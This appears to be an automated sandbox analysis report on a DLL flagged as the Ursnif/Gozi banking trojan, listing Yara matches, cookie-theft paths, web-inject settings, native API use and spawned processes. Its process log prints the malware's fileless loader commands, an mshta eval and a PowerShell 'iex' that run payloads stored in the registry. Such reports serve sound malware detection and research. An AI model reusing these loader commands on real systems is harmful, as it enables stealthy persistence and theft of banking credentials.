Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000023.00000000.433900760.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000023.00000000.429063403.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001B.00000002.1017567329.000001FE0020F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001B.00000003.459766982.000001FE6E879000.00000004.00000001.sdmp String found in binary or memory: https://go.microsoft.co
Source: u.dll String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_00765ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_00765ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_00765ECA
Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset, 0_2_10001C22
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001AD1 NtMapViewOfSection, 0_2_10001AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001252 GetLastError,NtClose, 0_2_10001252
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023C5 NtQueryVirtualMemory, 0_2_100023C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0076A027
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E010 GetProcAddress,NtCreateSection,memset, 0_2_0076E010
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00777AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_00777AFF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0076ACD5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00776CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_00776CBC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_0077AC94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077CD7A NtQueryInformationProcess, 0_2_0077CD7A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00777579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 0_2_00777579
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00769DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00769DAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00767E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_00767E14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007637E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_007637E7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007847A1 NtMapViewOfSection, 0_2_007847A1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00767878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_00767878
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007740A7 memset,NtQueryInformationProcess, 0_2_007740A7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0078298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0078298D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0076AA15
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00774C67 NtGetContextThread,RtlNtStatusToDosError, 0_2_00774C67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0077956E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007645FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_007645FF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00771606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00771606
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3F0D0 NtReadVirtualMemory, 38_2_00E3F0D0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E440A4 NtQueryInformationProcess, 38_2_00E440A4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E31084 NtQueryInformationProcess, 38_2_00E31084
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_00E4D9EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E269DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_00E269DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2B980 NtMapViewOfSection, 38_2_00E2B980
Source: C:\Windows\System32\control.exe Code function: 38_2_00E21148 NtCreateSection, 38_2_00E21148
Source: C:\Windows\System32\control.exe Code function: 38_2_00E41DF4 NtWriteVirtualMemory, 38_2_00E41DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E27DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_00E27DA0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E446EC NtAllocateVirtualMemory, 38_2_00E446EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E61002 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_00E61002
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00781CB8 CreateProcessAsUserA, 0_2_00781CB8
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A4 0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077D057 0_2_0077D057
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076D0DC 0_2_0076D0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00787188 0_2_00787188
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007662FA 0_2_007662FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00778BF3 0_2_00778BF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076E384 0_2_0076E384
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00764C03 0_2_00764C03
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077ED4B 0_2_0077ED4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00783EAF 0_2_00783EAF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077D7BD 0_2_0077D7BD
Source: C:\Windows\System32\control.exe Code function: 38_2_00E269DC 38_2_00E269DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E44B78 38_2_00E44B78
Source: C:\Windows\System32\control.exe Code function: 38_2_00E45428 38_2_00E45428
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3A0F0 38_2_00E3A0F0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A074 38_2_00E4A074
Source: C:\Windows\System32\control.exe Code function: 38_2_00E39850 38_2_00E39850
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3782C 38_2_00E3782C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3B814 38_2_00E3B814
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2B9E8 38_2_00E2B9E8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E419FC 38_2_00E419FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A9FC 38_2_00E4A9FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E399F8 38_2_00E399F8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E249C4 38_2_00E249C4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2596C 38_2_00E2596C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3D92C 38_2_00E3D92C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E5027C 38_2_00E5027C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4EA40 38_2_00E4EA40
Source: C:\Windows\System32\control.exe Code function: 38_2_00E46250 38_2_00E46250
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4E220 38_2_00E4E220
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3AA28 38_2_00E3AA28
Source: C:\Windows\System32\control.exe Code function: 38_2_00E22A34 38_2_00E22A34
Source: C:\Windows\System32\control.exe Code function: 38_2_00E29A34 38_2_00E29A34
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2DA3C 38_2_00E2DA3C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E37218 38_2_00E37218
Source: C:\Windows\System32\control.exe Code function: 38_2_00E403EC 38_2_00E403EC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E493FC 38_2_00E493FC
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4A3B2 38_2_00E4A3B2
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3B378 38_2_00E3B378
Source: C:\Windows\System32\control.exe Code function: 38_2_00E27B44 38_2_00E27B44
Source: C:\Windows\System32\control.exe Code function: 38_2_00E36B00 38_2_00E36B00
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2ECE0 38_2_00E2ECE0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2FCA0 38_2_00E2FCA0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E31C0C 38_2_00E31C0C
Source: C:\Windows\System32\control.exe Code function: 38_2_00E38DD0 38_2_00E38DD0
Source: C:\Windows\System32\control.exe Code function: 38_2_00E265D8 38_2_00E265D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E375D8 38_2_00E375D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E325A4 38_2_00E325A4
Source: C:\Windows\System32\control.exe Code function: 38_2_00E25DA8 38_2_00E25DA8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E4C560 38_2_00E4C560
Source: C:\Windows\System32\control.exe Code function: 38_2_00E47D44 38_2_00E47D44
Source: C:\Windows\System32\control.exe Code function: 38_2_00E36528 38_2_00E36528
Source: C:\Windows\System32\control.exe Code function: 38_2_00E296D8 38_2_00E296D8
Source: C:\Windows\System32\control.exe Code function: 38_2_00E3CE90 38_2_00E3CE90
Source: C:\Windows\System32\control.exe Code function: 38_2_00E21600 38_2_00E21600
Source: C:\Windows\System32\control.exe Code function: 38_2_00E50614 38_2_00E50614
Source: C:\Windows\System32\control.exe Code function: 38_2_00E2DF58 38_2_00E2DF58
PE / OLE file has an invalid certificate
Source: u.dll Static PE information: invalid certificate
PE file does not import any functions
Source: 0oy3xkhb.dll.32.dr Static PE information: No import functions for PE file found
Source: v0ewugxm.dll.29.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: u.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@27/55@9/1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0076A7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{22C6B3FB-198F-A42D-B376-5D18970AE1CC}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{12E2C3F3-499A-14DF-6366-8D8847FA113C}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E59EF8E-C5B2-6085-3F92-C994E3E60D08}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFAE8637EBB409A380.TMP
Source: u.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: u.dll Metadefender: Detection: 37%
Source: u.dll ReversingLabs: Detection: 62%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:464 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5508 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
